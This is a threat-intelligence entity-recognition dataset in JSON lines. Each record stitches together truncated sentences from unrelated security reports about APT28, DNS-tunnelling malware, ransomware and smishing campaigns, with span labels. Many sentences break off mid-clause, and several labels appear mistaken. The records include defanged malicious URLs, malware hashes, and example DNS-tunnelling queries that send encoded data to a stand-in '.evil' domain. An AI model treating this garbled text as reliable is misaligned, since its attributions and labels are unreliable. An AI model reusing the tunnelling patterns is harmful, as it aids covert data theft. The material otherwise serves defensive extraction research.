Although COSMICENERGY does not directly overlap with any previously observed malware families , its capabilities are comparable to those employed in previous incidents and malware .", "spans": [{"start": 14, "end": 21, "label": "Malware"}, {"start": 26, "end": 33, "label": "Malware"}, {"start": 135, "end": 140, "label": "Organization"}, {"start": 267, "end": 274, "label": "Indicator"}, {"start": 277, "end": 284, "label": "Malware"}, {"start": 437, "end": 449, "label": "Malware"}]} {"text": "Perhaps more information on XLoader will be known in the future . We assess that APT28 is most likely sponsored by the Russian government . Once written, the send operations . As confirmed by our own research data , CISA also found LockBit took the top spot as the biggest global ransomware threat in 2022 .", "spans": [{"start": 28, "end": 35, "label": "Malware"}, {"start": 81, "end": 86, "label": "Organization"}, {"start": 216, "end": 220, "label": "Organization"}, {"start": 232, "end": 239, "label": "Organization"}]} {"text": "For now , users can make the best of the knowledge they have now to significantly reduce the effectivity of such malware . Given the available data , we assess that APT28 's work is sponsored by the Russian government . Similar to text mode receiver, after AdrGen builds the string, a function to manually build and send the DNS query packet is . Suspicious Login Patterns on NetScaler", "spans": [{"start": 165, "end": 170, "label": "Organization"}, {"start": 257, "end": 263, "label": "Malware"}, {"start": 325, "end": 328, "label": "Indicator"}, {"start": 347, "end": 385, "label": "Indicator"}]} {"text": "Users of iOS can remove the malicious profile using the Apple Configurator 2 , Apple \u2019 s official iOS helper app for managing Apple devices . The targets were similar to a 2015 TG-4127 campaign \u2014 individuals in Russia and the former Soviet states , current and former military and government personnel in the U.S. 
and Europe , individuals working in the defense and government supply chain , and authors and journalists \u2014 but also included email accounts linked to the November 2016 United States presidential election . The text mode sender uses the same hardcoded transaction ID 0xa4a3; however, instead of sending queries for TXT resource records, the malware uses A resource . Rhysida will enumerate through directories and files in directories starting from \u201c A : \u201d to \u201c Z : \u201d drives , ensure they \u2019re missing from the \u201c exclude list \u201d and then \u201c process , \u201d i.e. , encrypt the files .", "spans": [{"start": 9, "end": 12, "label": "System"}, {"start": 56, "end": 61, "label": "Organization"}, {"start": 79, "end": 84, "label": "Organization"}, {"start": 98, "end": 101, "label": "System"}, {"start": 126, "end": 131, "label": "Organization"}, {"start": 268, "end": 276, "label": "Organization"}, {"start": 281, "end": 301, "label": "Organization"}, {"start": 354, "end": 361, "label": "Organization"}, {"start": 366, "end": 376, "label": "Organization"}, {"start": 396, "end": 403, "label": "Organization"}, {"start": 408, "end": 419, "label": "Organization"}, {"start": 681, "end": 688, "label": "Malware"}, {"start": 694, "end": 788, "label": "Indicator"}, {"start": 791, "end": 888, "label": "Indicator"}]} {"text": "Following simple best practices , like strictly downloading applications or any files from trusted sources and being wary of unsolicited messages , can also prevent similar attacks from compromising devices . The targets of TG-4127 include military , government and defense sectors . As with the text mode receiver, the query is made with a direct connection to the controller IP address as opposed to allowing the query to propagate the native DNS . 
Earlier campaigns used an executable downloader , while the later ones used DLLs for the next stage .", "spans": [{"start": 224, "end": 231, "label": "Organization"}, {"start": 240, "end": 248, "label": "Organization"}, {"start": 251, "end": 261, "label": "Organization"}, {"start": 266, "end": 281, "label": "Organization"}, {"start": 445, "end": 448, "label": "Indicator"}, {"start": 477, "end": 498, "label": "System"}, {"start": 527, "end": 531, "label": "System"}]} {"text": "Indicators of Compromise SHA256 Package App label 332e68d865009d627343b89a5744843e3fde4ae870193f36b82980363439a425 ufD.wykyx.vlhvh SEX kr porn 403401aa71df1830d294b78de0e5e867ee3738568369c48ffafe1b15f3145588 ufD.wyjyx.vahvh \u4f50\u5ddd\u6025\u4fbf 466dafa82a4460dcad722d2ad9b8ca332e9a896fc59f06e16ebe981ad3838a6b Some of APT28 's more commonly used tools are the SOURFACE downloader , its second stage backdoor EVILTOSS , and a modular family of implants that we call CHOPSTICK . If the send function is being invoked in ping mode, the process described above is followed; however, instead of manually building and transmitting the DNS query, the [System.Net.Dns]::GetHostAddresses method is . 
In the months leading up to and after Russia \u2019s illegal further invasion began , Ukraine experienced a series of disruptive cyber operations , including website defacements , distributed denial - of - service ( DDoS ) attacks , and cyber attacks to delete data from computers belonging to government and private entities \u2013 all part of the Russian playbook .", "spans": [{"start": 50, "end": 114, "label": "Indicator"}, {"start": 115, "end": 130, "label": "Indicator"}, {"start": 143, "end": 207, "label": "Indicator"}, {"start": 208, "end": 223, "label": "Indicator"}, {"start": 229, "end": 293, "label": "Indicator"}, {"start": 302, "end": 307, "label": "Organization"}, {"start": 344, "end": 363, "label": "System"}, {"start": 392, "end": 400, "label": "System"}, {"start": 409, "end": 435, "label": "System"}, {"start": 449, "end": 458, "label": "System"}, {"start": 613, "end": 616, "label": "Indicator"}, {"start": 756, "end": 763, "label": "Organization"}, {"start": 778, "end": 815, "label": "Organization"}, {"start": 1010, "end": 1030, "label": "Organization"}]} {"text": "com.dhp.ozqh Facebook 5022495104c280286e65184e3164f3f248356d065ad76acef48ee2ce244ffdc8 ufD.wyjyx.vahvh Anshin Scan a0f3df39d20c4eaa410a61a527507dbc6b17c7f974f76e13181e98225bda0511 com.aqyh.xolo \u4f50\u5ddd\u6025\u4fbf cb412b9a26c1e51ece7a0e6f98f085e1c27aa0251172bf0a361eb5d1165307f7 While TG-4127 continues to primarily threaten organizations and individuals operating in Russia and former Soviet states , this campaign illustrates its willingness to expand its scope to other targets that have intelligence of interest to the Russian government . With that method, the malware\u2019s query will traverse the native DNS architecture as opposed to the victim making a direct connection to the . 
Kaspersky \u2019s Global Research and Analysis Team ( GReAT ) has observed signs of its attacks in several countries including Germany , South Korea and Uzbekistan , as well as the US .", "spans": [{"start": 0, "end": 12, "label": "Indicator"}, {"start": 13, "end": 21, "label": "Organization"}, {"start": 22, "end": 86, "label": "Indicator"}, {"start": 87, "end": 102, "label": "Indicator"}, {"start": 115, "end": 179, "label": "Indicator"}, {"start": 180, "end": 193, "label": "Indicator"}, {"start": 199, "end": 263, "label": "Indicator"}, {"start": 270, "end": 277, "label": "Organization"}, {"start": 592, "end": 595, "label": "Indicator"}, {"start": 670, "end": 726, "label": "Organization"}]} {"text": "jp.co.sagawa.SagawaOfficialApp \u4f50\u5ddd\u6025\u4fbf Malicious URLs : hxxp : //38 [ . CTU researchers assess with moderate confidence that the group is operating from the Russian Federation and is gathering intelligence on behalf of the Russian government . The send function uses several counters to maintain various pieces of information used to control the flow of . shellcode Download a shellcode and run by injecting it in a target process .", "spans": [{"start": 0, "end": 30, "label": "Indicator"}, {"start": 53, "end": 68, "label": "Indicator"}, {"start": 69, "end": 72, "label": "Organization"}, {"start": 126, "end": 131, "label": "Organization"}, {"start": 353, "end": 362, "label": "Malware"}]} {"text": "] 27 [ . This intelligence has been critical to protecting and informing our clients , exposing this threat , and strengthening our confidence in attributing APT28 to the Russian Government . An exception counter is used to track the number of exceptions and will exit the send loop if a threshold is . In one exchange on Aug. 
16 , 2012 , Ashley Madison \u2019s director of IT was asked to produce a list of all company employees with all - powerful administrator access .", "spans": [{"start": 158, "end": 163, "label": "Organization"}, {"start": 339, "end": 371, "label": "Organization"}]} {"text": "] 99 [ . Our visibility into the operations of APT28 - a group we believe the Russian Government sponsors - has given us insight into some of the government 's targets , as well as its objectives and the activities designed to further them . The send counter is used to track the number of chunks sent to the . Given Sandworm \u2019s global threat activity and novel OT capabilties , we urge OT asset owners to take action to mitigate this threat .", "spans": [{"start": 47, "end": 52, "label": "Organization"}, {"start": 57, "end": 62, "label": "Organization"}, {"start": 146, "end": 156, "label": "Organization"}, {"start": 317, "end": 351, "label": "Organization"}, {"start": 387, "end": 389, "label": "Organization"}]} {"text": "] 11/xvideo/ hxxp : //apple-icloud [ . Since at least 2007 , APT28 has engaged in extensive operations in support of Russian strategic interests . An additional counter exists to handle cases where the file being sent is larger than 250 . The purpose of these attacks and their focus on IT and communication companies is believed to be to facilitate supply chain attacks on their clients .", "spans": [{"start": 13, "end": 38, "label": "Indicator"}, {"start": 61, "end": 66, "label": "Organization"}, {"start": 287, "end": 317, "label": "Organization"}]} {"text": "] qwe-japan [ . APT28 espionage activity has primarily targeted entities in the U.S. , Europe , and the countries of the former Soviet Union , including governments , militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian Government . The send counter is initialized to 0 and read from the fourth octet of the A record returned by the . 
The series features interviews with security experts and journalists , Ashley Madison executives , victims of the breach and jilted spouses .", "spans": [{"start": 153, "end": 164, "label": "Organization"}, {"start": 167, "end": 177, "label": "Organization"}, {"start": 180, "end": 196, "label": "Organization"}, {"start": 199, "end": 213, "label": "Organization"}, {"start": 220, "end": 230, "label": "Organization"}, {"start": 235, "end": 242, "label": "Organization"}, {"start": 425, "end": 441, "label": "Organization"}, {"start": 446, "end": 457, "label": "Organization"}, {"start": 460, "end": 485, "label": "Organization"}, {"start": 488, "end": 509, "label": "Organization"}, {"start": 514, "end": 528, "label": "Organization"}]} {"text": "] com hxxp : //apple-icloud [ . APT28 espionage activity has primarily targeted entities in the U.S. , Europe , and the countries of the former Soviet Union , including governments and militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian Government . The send counter is also passed to the AdrGen function as the part number parameter and is visible in the query string as depicted below: Query: 239e965ec000a60000B6C90T.COCTab33333233332222222222222222210100A3280AAAAAAAAAAAAAAAAA.33333210100A.sample-domain.evil , Response: 39.2.3.1 , Query: 230019e965eca60000A16DC20T.EBB466767667256666772556776662FBFD932F3F64079E4F730B65239FE0.33333210100A.sample-domain.evil , Response: 39.2.3.2 , Query: 392e002965eca60000C6D18C42T.33232333332333500262233332466710E0E18362E239DDA839020190D932.33333210100A.sample-domain.evil . 
Attacks start with VBA code to decode the next malware stage All campaigns start with Microsoft Office documents , which are possibly sent to the targets as email attachments .", "spans": [{"start": 6, "end": 31, "label": "Indicator"}, {"start": 169, "end": 180, "label": "Organization"}, {"start": 185, "end": 195, "label": "Organization"}, {"start": 198, "end": 214, "label": "Organization"}, {"start": 217, "end": 231, "label": "Organization"}, {"start": 238, "end": 248, "label": "Organization"}, {"start": 253, "end": 260, "label": "Organization"}, {"start": 344, "end": 350, "label": "Malware"}, {"start": 450, "end": 567, "label": "Indicator"}, {"start": 580, "end": 588, "label": "Indicator"}, {"start": 598, "end": 717, "label": "Indicator"}, {"start": 730, "end": 738, "label": "Indicator"}, {"start": 748, "end": 868, "label": "Indicator"}, {"start": 932, "end": 945, "label": "Organization"}]} {"text": "] qwq-japan [ . Over the past two years , Russia appears to have increasingly leveraged APT28 to conduct information operations commensurate with broader strategic military doctrine . When the send loop has fewer than 60 bytes to send (e.g., a small file or the last part of a file), the send function transmits the remaining bytes with a shorter data . Typically , they steal information , including intellectual property , personally identifying information , and money to fund or further espionage and exploitation causes .", "spans": [{"start": 88, "end": 93, "label": "Organization"}]} {"text": "] com/ hxxp : //apple-icloud [ . After compromising a victim organization , APT28 will steal internal data that is then leaked to further political narratives aligned with Russian interests . When there are no more bytes to send, a hardcoded file end marker COCTabCOCT is sent in the data section and the send loop will be . 
Leveraging this access , an attacker can send remote commands to affect the actuation of power line switches and circuit breakers to cause power disruption .", "spans": [{"start": 7, "end": 32, "label": "Indicator"}, {"start": 76, "end": 81, "label": "Organization"}]} {"text": "] zqo-japan [ . After compromising a political organization , APT28 will steal internal data . The controller responds with the 253.25.42.87 A record . CrowdStrike incident responders found that renamed Plink and AnyDesk executable creation timestamps on affected backend Exchange servers were closely correlated with PowerShell execution events in the Remote PowerShell logs , indicating the threat actor leveraged the newly discovered exploit chain to drop other tooling for persistent access to the affected Exchange servers .", "spans": [{"start": 37, "end": 59, "label": "Organization"}, {"start": 62, "end": 67, "label": "Organization"}, {"start": 128, "end": 140, "label": "Indicator"}, {"start": 152, "end": 183, "label": "Organization"}, {"start": 195, "end": 375, "label": "Indicator"}, {"start": 393, "end": 405, "label": "Organization"}]} {"text": "] com/ hxxp : //files.spamo [ . On December 29 , 2016 , the Department of Homeland Security ( DHS ) and Federal Bureau of Investigation ( FBI ) released a Joint Analysis Report confirming FireEye 's long held public assessment that the Russian Government sponsors APT28 . Query: 239055e965eca60000CC30T.66654667676673003300C93CC92212953EDACEDA.33333210100A.sample-domain.evil , Response: 39.2.3.56 , Query: 05639e9652eca6000057C06T.COCTabCOCT33333210100A.sample-domain.evil , Response: 253.25.42.87 . 
Additionally , while KillNet has targeted NATO countries and organizations since early to mid-2022 , it declared a focused operation against NATO in early 2023 and created a Telegram channel in April 2023 dedicated to this operation .", "spans": [{"start": 7, "end": 31, "label": "Indicator"}, {"start": 60, "end": 91, "label": "Organization"}, {"start": 94, "end": 97, "label": "Organization"}, {"start": 138, "end": 141, "label": "Organization"}, {"start": 188, "end": 195, "label": "Organization"}, {"start": 264, "end": 269, "label": "Organization"}, {"start": 279, "end": 375, "label": "Indicator"}, {"start": 388, "end": 397, "label": "Indicator"}, {"start": 407, "end": 473, "label": "Indicator"}, {"start": 486, "end": 498, "label": "Indicator"}, {"start": 534, "end": 557, "label": "Organization"}]} {"text": "] jp/\u4f50\u5ddd\u6025\u4fbf.apk hxxp : //mailsa-qae [ . In October 2014 , FireEye released APT28 : A Window into Russia 's Cyber Espionage Operations , and characterized APT28 's activity as aligning with the Russian Government 's strategic intelligence requirements . Once an A record response is received by the malware containing 253.25.42.87 , several variables are set in preparation to exit the send . Currently , Mandiant can neither validate claims related to Zarya \u2019s hacking capabilities , nor those related to the group \u2019s potential links to the FSB .", "spans": [{"start": 14, "end": 37, "label": "Indicator"}, {"start": 56, "end": 63, "label": "Organization"}, {"start": 73, "end": 78, "label": "Organization"}, {"start": 152, "end": 157, "label": "Organization"}, {"start": 315, "end": 327, "label": "Indicator"}, {"start": 402, "end": 410, "label": "Organization"}, {"start": 539, "end": 542, "label": "Organization"}]} {"text": "] com hxxp : //mailsa-qaf [ . 
In October 2014 , FireEye released APT28 : A Window into Russia 's Cyber Espionage Operations' , and characterized APT28 's activity as aligning with the Russian Government 's strategic intelligence requirements . After the send operation is complete, the lock file for the current run is deleted and the script . In addition , Hack520 \u2019s tweets always show photos of the same animal , which is likely his pet pig .", "spans": [{"start": 6, "end": 29, "label": "Indicator"}, {"start": 48, "end": 55, "label": "Organization"}, {"start": 65, "end": 70, "label": "Organization"}, {"start": 145, "end": 150, "label": "Organization"}, {"start": 358, "end": 365, "label": "Organization"}]} {"text": "] com hxxp : //mailsa-qau [ . APT28 targets Russian rockers and dissidents Pussy Riot via spear-phishing emails . Many of the capabilities discovered in Glimpse were also present in the malware analyzed in part one of this . It seems that the legitimate macro code is used to calculate some values in the spreadsheets , but the legitimate functions are changed to call the function that starts the infection process .", "spans": [{"start": 6, "end": 29, "label": "Indicator"}, {"start": 30, "end": 35, "label": "Organization"}, {"start": 52, "end": 59, "label": "Organization"}, {"start": 64, "end": 74, "label": "Organization"}, {"start": 153, "end": 160, "label": "Malware"}, {"start": 239, "end": 317, "label": "Malware"}, {"start": 324, "end": 415, "label": "Malware"}]} {"text": "] com hxxp : //mailsa-qaw [ . Our investigation of APT28 's compromise of WADA 's network , and our observations of the surrounding events reveal how Russia sought to counteract a damaging narrative and delegitimize the institutions leveling criticism . Glimpse added the ability to use an alternate DNS resource record type (TXT) as opposed to solely relying on A resource records for DNS . 
None Deploy advanced endpoint detection and response ( EDR ) tools to all endpoints to detect web services spawning PowerShell or command line processes .", "spans": [{"start": 6, "end": 29, "label": "Indicator"}, {"start": 51, "end": 56, "label": "Organization"}, {"start": 254, "end": 261, "label": "Malware"}, {"start": 300, "end": 303, "label": "Indicator"}, {"start": 386, "end": 389, "label": "Indicator"}]} {"text": "] com hxxp : //mailsa-wqe [ . Since releasing our 2014 report , we continue to assess that APT28 is sponsored by the Russian Government . Using TXT resource records enabled the actors to provide tasking in fewer transactions due to the amount of data that can be transmitted in a TXT . Another new actor we discovered , seemingly of Vietnamese origin , uses a Yashma ransomware variant to target victims in Bulgaria , China , Vietnam and other countries .", "spans": [{"start": 6, "end": 29, "label": "Indicator"}, {"start": 91, "end": 96, "label": "Organization"}, {"start": 407, "end": 415, "label": "Organization"}, {"start": 418, "end": 423, "label": "Organization"}, {"start": 426, "end": 433, "label": "Organization"}]} {"text": "] com hxxp : //mailsa-wqo [ . In our 2014 report , we identified APT28 as a suspected Russian government-sponsored espionage actor . To support this capability, the adversaries chose to manually craft the DNS queries and communicate directly with the controller as opposed to using existing .NET DNS . 
Whoever hacked Ashley Madison had access to all employee emails , but they only released Biderman \u2019s messages \u2014 three years worth .", "spans": [{"start": 6, "end": 29, "label": "Indicator"}, {"start": 65, "end": 70, "label": "Organization"}, {"start": 115, "end": 130, "label": "Organization"}, {"start": 205, "end": 208, "label": "Indicator"}, {"start": 291, "end": 295, "label": "Indicator"}, {"start": 296, "end": 299, "label": "Indicator"}, {"start": 317, "end": 331, "label": "Organization"}]} {"text": "] com hxxp : //mailsa-wqp [ . For full details , please reference our 2014 report , APT28 : A Window into Russia 's Cyber Espionage Operations . The differences between PoisonFrog and Glimpse highlight the ease at which adversaries can modify their tools to meet their end . The Winnti group diversified its targets to include enterprises such as those in pharmaceutics and telecommunications .", "spans": [{"start": 6, "end": 29, "label": "Indicator"}, {"start": 84, "end": 89, "label": "Organization"}, {"start": 169, "end": 179, "label": "Malware"}, {"start": 184, "end": 191, "label": "Malware"}, {"start": 279, "end": 291, "label": "Organization"}, {"start": 356, "end": 369, "label": "Organization"}, {"start": 374, "end": 392, "label": "Organization"}]} {"text": "] com hxxp : //mailsa-wqq [ . The espionage group , which according to the U.S. Department of Homeland Security ( DHS ) and the Federal Bureau of Investigation ( FBI ) is linked to the Russian government , returned to low-key intelligence-gathering operations during 2017 and into 2018 , targeting a range of military and government targets in Europe and South America . With regard to detection, several methods can be used to identify this type of C2 . 
During the course of researching the Winnti group , we came across previously unreported malware samples that we attributed to the group based on the malware arsenal and the use of registered domains as attack infrastructure .", "spans": [{"start": 6, "end": 29, "label": "Indicator"}, {"start": 34, "end": 49, "label": "Organization"}, {"start": 80, "end": 111, "label": "Organization"}, {"start": 114, "end": 117, "label": "Organization"}, {"start": 162, "end": 165, "label": "Organization"}, {"start": 309, "end": 317, "label": "Organization"}, {"start": 322, "end": 332, "label": "Organization"}, {"start": 450, "end": 452, "label": "System"}, {"start": 492, "end": 504, "label": "Organization"}, {"start": 522, "end": 559, "label": "Malware"}, {"start": 605, "end": 620, "label": "Malware"}, {"start": 636, "end": 654, "label": "System"}]} {"text": "] com hxxp : //mailsa-wqu [ . The APT28 , which is linked to the Russian government , returned to low-key intelligence-gathering operations during 2017 and into 2018 , targeting a range of military and government targets in Europe and South America . Performing entropy calculations on subdomain labels can help highlight the amount of randomness in a label, but this is just one of many possible data analysis points, since a standalone feature may not be enough to determine whether traffic is . More information TunnelVision has been observed exploiting Fortinet FortiOS CVE201813379 , Microsoft Exchange ProxyShell and the recent Log4Shell vulnerabilities .", "spans": [{"start": 6, "end": 29, "label": "Indicator"}, {"start": 34, "end": 39, "label": "Organization"}, {"start": 189, "end": 197, "label": "Organization"}, {"start": 202, "end": 212, "label": "Organization"}, {"start": 566, "end": 586, "label": "Vulnerability"}, {"start": 589, "end": 618, "label": "Vulnerability"}, {"start": 634, "end": 643, "label": "Vulnerability"}]} {"text": "] com hxxp : //mailsa-wqw [ . 
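The TXT-record tasking and the entropy observation above describe two separable features of DNS-based C2, and the text itself cautions that a single feature is rarely enough on its own. The following Python is an added example, not IronNet's or any vendor's code, that scores per-client DNS query logs on both features together and only reports clients that trip more than one. The log format, the thresholds and every query name are constructed for the example.

```python
"""Score DNS query logs for TXT-heavy, high-entropy C2 traffic (added example)."""
import math
from collections import Counter, defaultdict

# Constructed sample log: "<client-ip> <qtype> <qname>" per line. Not from any real capture;
# the 16-hex-character leftmost labels imitate encoded tasking requests.
SAMPLE_LOG = """\
10.0.0.5 A www.example.com
10.0.0.5 A cdn.example.com
10.0.0.7 TXT 3f9a1c7e2b8d4a6f.c2-domain.example
10.0.0.7 TXT 9d2e6b1f4a8c3e7b.c2-domain.example
10.0.0.7 TXT b71c0e5d8f2a4c9e.c2-domain.example
10.0.0.7 A mail.example.com
10.0.0.9 A login.example.com
"""


def shannon_entropy(label: str) -> float:
    """Shannon entropy in bits per character of one DNS label (0.0 for an empty label)."""
    if not label:
        return 0.0
    n = len(label)
    return -sum((c / n) * math.log2(c / n) for c in Counter(label).values())


def parse_log(text: str):
    """Yield (client, qtype, qname) tuples; malformed lines are skipped."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        client, qtype, qname = parts
        yield client, qtype.upper(), qname.lower().rstrip(".")


def score_clients(text: str, entropy_threshold: float = 3.0,
                  txt_ratio_threshold: float = 0.5, min_queries: int = 3) -> dict:
    """Return {client: [reasons]} for clients that trip at least two independent signals.

    The thresholds are assumptions for this example; tune them against your own baseline.
    """
    stats = defaultdict(lambda: {"total": 0, "txt": 0, "high_entropy": 0})
    for client, qtype, qname in parse_log(text):
        s = stats[client]
        s["total"] += 1
        if qtype == "TXT":
            s["txt"] += 1
        # Only the leftmost label carries the encoded data in the scheme described.
        if shannon_entropy(qname.split(".")[0]) >= entropy_threshold:
            s["high_entropy"] += 1

    findings = {}
    for client, s in stats.items():
        if s["total"] < min_queries:
            continue  # too few queries to judge
        reasons = []
        txt_ratio = s["txt"] / s["total"]
        if txt_ratio >= txt_ratio_threshold:
            reasons.append(f"TXT ratio {txt_ratio:.2f}")
        if s["high_entropy"] >= min_queries:
            reasons.append(f"{s['high_entropy']} high-entropy leftmost labels")
        if len(reasons) >= 2:  # one feature alone is not decisive, as the text notes
            findings[client] = reasons
    return findings


if __name__ == "__main__":
    for client, reasons in score_clients(SAMPLE_LOG).items():
        print(client, "->", "; ".join(reasons))
```

Run against the constructed log, only 10.0.0.7 is reported: it sends three TXT queries out of four, and each of those carries a leftmost label with 3.75 bits of entropy per character, whereas the ordinary hostnames score between 0 and about 2.3 bits. Clients with fewer than `min_queries` entries are ignored rather than scored, which is the usual way to keep a one-off lookup from raising an alert.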
Another attack group , Earworm ( aka Zebrocy ) , has been active since at least May 2016 and is involved in what appears to be intelligence gathering operations against military targets in Europe , Central Asia , and Eastern Asia . The IronDefense Network Traffic Analysis platform combines several behavioral detection methods alongside historical network information to detect the C2 techniques used by Glimpse and other . Adversaries may also use CLIs to install and run new software , including malicious tools that may be installed over the course of an operation .", "spans": [{"start": 6, "end": 29, "label": "Indicator"}, {"start": 38, "end": 50, "label": "Organization"}, {"start": 53, "end": 60, "label": "Organization"}, {"start": 67, "end": 74, "label": "Organization"}, {"start": 413, "end": 415, "label": "System"}, {"start": 435, "end": 442, "label": "Malware"}]} {"text": "] com hxxp : //nttdocomo-qae [ . Several sources consider APT28 a group of CyberMercs based in Russia . Carbon Black TAU ThreatSight Analysis GandCrab and Ursnif . Bullock had spent many hours poring over the hundreds of thousands of emails that the Ashley Madison hackers stole from Biderman and published online in 2015 .", "spans": [{"start": 6, "end": 32, "label": "Indicator"}, {"start": 58, "end": 63, "label": "Organization"}, {"start": 66, "end": 71, "label": "Organization"}, {"start": 104, "end": 132, "label": "Organization"}, {"start": 142, "end": 150, "label": "Malware"}, {"start": 155, "end": 161, "label": "Malware"}, {"start": 164, "end": 171, "label": "Organization"}, {"start": 250, "end": 272, "label": "Organization"}, {"start": 284, "end": 292, "label": "Organization"}]} {"text": "] com hxxp : //nttdocomo-qaq [ . The primary targets of APT28 are potential victims in several countries such as Ukraine , Spain , Russia , Romania , the United States and Canada . The Carbon Black ThreatSight team observed an interesting campaign over the last month . 
One initiative in the European Union has helped more than 1.5 million ransomware victims .", "spans": [{"start": 6, "end": 32, "label": "Indicator"}, {"start": 56, "end": 61, "label": "Organization"}, {"start": 185, "end": 209, "label": "Organization"}, {"start": 292, "end": 306, "label": "Organization"}, {"start": 340, "end": 358, "label": "Organization"}]} {"text": "] com hxxp : //nttdocomo-qaq [ . We have reasons to believe that the operators of the APT28 network are either Russian citizens or citizens of a neighboring country that speak Russian . ThreatSight worked with the Threat Analysis Unit ( TAU ) to research the campaign . Beyond basic cybersecurity hygiene , including auditing current IT environments for vulnerabilities , implementing needed patches and regularly employing backups , it is imperative to have multi-factor authentication as a minimum on any external-facing RDP , whilst preferably removing external-facing RDP altogether .", "spans": [{"start": 6, "end": 32, "label": "Indicator"}, {"start": 69, "end": 78, "label": "Organization"}, {"start": 86, "end": 91, "label": "Organization"}, {"start": 119, "end": 127, "label": "Organization"}, {"start": 131, "end": 139, "label": "Organization"}, {"start": 186, "end": 197, "label": "Organization"}, {"start": 214, "end": 234, "label": "Organization"}, {"start": 237, "end": 240, "label": "Organization"}]} {"text": "] com/aa hxxp : //nttdocomo-qar [ . Previous work published by security vendor FireEye in October 2014 suggests the group might be of Russian origin . This report is being released to help researchers and security practitioners combat this campaign as new samples are being discovered in the wild daily . 
They chose the appropriate DLL by passing a flag in the first argument .", "spans": [{"start": 9, "end": 35, "label": "Indicator"}, {"start": 79, "end": 86, "label": "Organization"}, {"start": 116, "end": 121, "label": "Organization"}, {"start": 305, "end": 376, "label": "Malware"}]} {"text": "] com hxxp : //nttdocomo-qat [ . Finally , the use of recent domestic events and a prominent US military exercise focused on deterring Russian aggression highlights APT28 's ability and interest in exploiting geopolitical events for their operations . This attack , if successful , can infect a compromised system with both Ursnif malware and GandCrab ransomware . Create NSPPE core dump files on NetScaler ( instructions from vendor ) .", "spans": [{"start": 6, "end": 32, "label": "Indicator"}, {"start": 96, "end": 104, "label": "Organization"}, {"start": 164, "end": 169, "label": "Organization"}, {"start": 208, "end": 220, "label": "Organization"}, {"start": 323, "end": 329, "label": "Malware"}, {"start": 342, "end": 350, "label": "Malware"}]} {"text": "] com hxxp : //nttdocomo-qaw [ . In 2013 , the Sofacy group expanded their arsenal and added more backdoors and tools , including CORESHELL , SPLM , JHUHUGIT , AZZY and a few others . The overall attack leverages several different approaches , which are popular techniques amongst red teamers , espionage focused adversaries , and large scale criminal campaigns . Adversaries may utilize many different protocols , including those used for web browsing , transferring files , electronic mail , or DNS .", "spans": [{"start": 6, "end": 32, "label": "Indicator"}, {"start": 47, "end": 59, "label": "Organization"}, {"start": 130, "end": 139, "label": "System"}, {"start": 142, "end": 146, "label": "System"}, {"start": 149, "end": 157, "label": "System"}, {"start": 160, "end": 164, "label": "System"}, {"start": 364, "end": 375, "label": "Organization"}]} {"text": "] com hxxp : //sagawa-reg [ . 
In 2013 , the Sofacy group expanded their arsenal and added more backdoors and tools , including CORESHELL , SPLM ( aka Xagent , aka CHOPSTICK ) , JHUHUGIT ( which is built with code from the Carberp sources ) , AZZY ( aka ADVSTORESHELL , NETUI , EVILTOSS , and spans across 4-5 generations ) and a few others . This campaign originally came in via phishing emails that contained an attached Word document with embedded macros , Carbon Black located roughly 180 variants in the wild . Problems also arise when organizations turn a blind eye to the usage of commercial spyware .", "spans": [{"start": 6, "end": 29, "label": "Indicator"}, {"start": 44, "end": 56, "label": "Organization"}, {"start": 127, "end": 136, "label": "System"}, {"start": 139, "end": 143, "label": "System"}, {"start": 150, "end": 156, "label": "System"}, {"start": 163, "end": 172, "label": "System"}, {"start": 177, "end": 185, "label": "System"}, {"start": 222, "end": 229, "label": "System"}, {"start": 242, "end": 246, "label": "System"}, {"start": 277, "end": 285, "label": "System"}, {"start": 422, "end": 435, "label": "System"}, {"start": 459, "end": 471, "label": "Organization"}, {"start": 540, "end": 553, "label": "Organization"}]} {"text": "] com/ hxxp : //www [ . The Sofacy group spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware . The macro would call an encoded PowerShell script and then use a series of techniques to download and execute both a Ursnif and GandCrab variant . 
The URLs provided access to the C2s , along with commands and encrypted transfers of additional backdoors onto the system via GIF files .", "spans": [{"start": 7, "end": 23, "label": "Indicator"}, {"start": 28, "end": 40, "label": "Organization"}, {"start": 84, "end": 98, "label": "Vulnerability"}, {"start": 116, "end": 123, "label": "System"}, {"start": 130, "end": 150, "label": "System"}, {"start": 215, "end": 225, "label": "System"}, {"start": 300, "end": 306, "label": "Malware"}, {"start": 311, "end": 319, "label": "Malware"}]} {"text": "] 711231 [ . APT28 spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware . This campaign has been discussed at a high level by other researchers publicly . None LIGHTWORK is a disruption tool written in C++ that implements the IEC-104 protocol to modify the state of RTUs over TCP .", "spans": [{"start": 13, "end": 18, "label": "Organization"}, {"start": 62, "end": 76, "label": "Vulnerability"}, {"start": 94, "end": 101, "label": "System"}, {"start": 108, "end": 128, "label": "System"}, {"start": 247, "end": 256, "label": "System"}, {"start": 262, "end": 277, "label": "System"}, {"start": 289, "end": 292, "label": "System"}]} {"text": "] com hxxp : //www [ . The group spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware . Carbon Black product specific content can be located in the User Exchange . certutil.exe", "spans": [{"start": 6, "end": 22, "label": "Indicator"}, {"start": 27, "end": 32, "label": "Organization"}, {"start": 76, "end": 90, "label": "Vulnerability"}, {"start": 108, "end": 115, "label": "System"}, {"start": 122, "end": 142, "label": "System"}, {"start": 175, "end": 187, "label": "Organization"}, {"start": 235, "end": 248, "label": "System"}, {"start": 251, "end": 263, "label": "System"}]} {"text": "] 759383 [ . 
